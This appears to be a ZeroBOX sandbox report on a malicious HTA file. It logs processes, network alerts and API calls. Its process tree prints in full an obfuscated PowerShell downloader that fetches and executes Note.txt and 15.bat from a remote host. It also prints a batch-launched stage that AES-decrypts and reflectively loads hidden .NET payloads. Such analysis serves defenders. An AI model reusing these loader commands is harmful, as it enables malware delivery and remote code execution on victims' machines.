Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 21, 2024, 12:44 p.m.	April 21, 2024, 12:46 p.m.

Size	12.8KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`c4c06bc09d5d07d8abdb074e80806d07`
SHA256	`c5010ef902c9a8421aaf07a4ac475667c0b2ddae0b2d4c2f4c28aa7b7f482b3d`
CRC32	`0B6FD60E`
ssdeep	`384:yCG1ce3Nf2/B8L0L2/B8eNnCOHk2/B8ZNUNTBbuq80Kuhv+K0NuG8QS2Va2XKFVq:KuJvVCBy`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\.hta
2556
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
  2640
  - notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\Note.txt
    2812
  - cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\15.bat" "
    2864
    - cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\15.bat"
      2968
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
        3052
      - powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        604

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
193.222.96.128	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 193.222.96.128:7287 -> 192.168.56.101:49165	2400036	ET DROP Spamhaus DROP Listed Traffic Inbound group 37	Misc Attack

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2024, 12:44 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 21, 2024, 12:44 p.m.			0	0
IsDebuggerPresent April 21, 2024, 12:44 p.m.			0	0

Command line console output was observed (50 out of 62 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: At line:1 char:691 console_handle: 0x00000053	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: + function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcL console_handle: 0x0000005f	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: N, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeC console_handle: 0x0000006b	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: BFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLg console_handle: 0x00000077	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: cLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell console_handle: 0x00000083	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: .exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQx console_handle: 0x0000008f	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: ZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{S console_handle: 0x0000009b	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: tart-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM console_handle: 0x000000a7	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366 console_handle: 0x000000b3	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: ,68407,68404,68400,68409,68415));[Net.ServicePointManager]:: <<<< SecurityProto console_handle: 0x000000bf	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: col = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.Dow console_handle: 0x000000cb	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: nloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsd console_handle: 0x000000d7	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: NnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $ console_handle: 0x000000e3	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $g console_handle: 0x000000ef	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: sScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cn console_handle: 0x000000fb	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: ysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){In console_handle: 0x00000107	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: voke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBF console_handle: 0x00000113	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: XfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,6 console_handle: 0x0000011f	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: 354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluA console_handle: 0x00000137	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: IEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNul console_handle: 0x00000143	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: Sp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $Y console_handle: 0x0000014f	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: iQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68 console_handle: 0x0000015b	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: 5));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieG console_handle: 0x0000017f	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: jH; console_handle: 0x0000018b	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x00000197	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x000001a3	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x0000001b	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x00000027	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x00000033	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: sl3, Tls"." console_handle: 0x0000003f	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: At line:1 char:691 console_handle: 0x0000004b	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: + function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcL console_handle: 0x00000057	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: N, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeC console_handle: 0x00000067	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: BFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLg console_handle: 0x00000073	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: cLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell console_handle: 0x0000007f	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: .exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQx console_handle: 0x0000008b	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: ZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{S console_handle: 0x0000009b	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: tart-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM console_handle: 0x000000a7	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366 console_handle: 0x000000b3	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: ,68407,68404,68400,68409,68415));[Net.ServicePointManager]:: <<<< SecurityProto console_handle: 0x000000bf	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: col = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.Dow console_handle: 0x000000cb	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: nloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsd console_handle: 0x000000d7	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: NnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $ console_handle: 0x000000e3	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $g console_handle: 0x000000ef	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: sScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cn console_handle: 0x000000fb	1	1
WriteConsoleW April 21, 2024, 12:44 p.m.	buffer: ysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){In console_handle: 0x00000107	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 88 events)

Time & API	Arguments	Status	Return
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e29c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2e48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e26c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e3348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e3348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e3348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e3348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e3348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e3348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e3348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e3348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2dc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e2dc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e2770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2024, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e2e70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 21, 2024, 12:44 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 288 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a10000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x717e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0226a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x717e2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02262000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02272000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
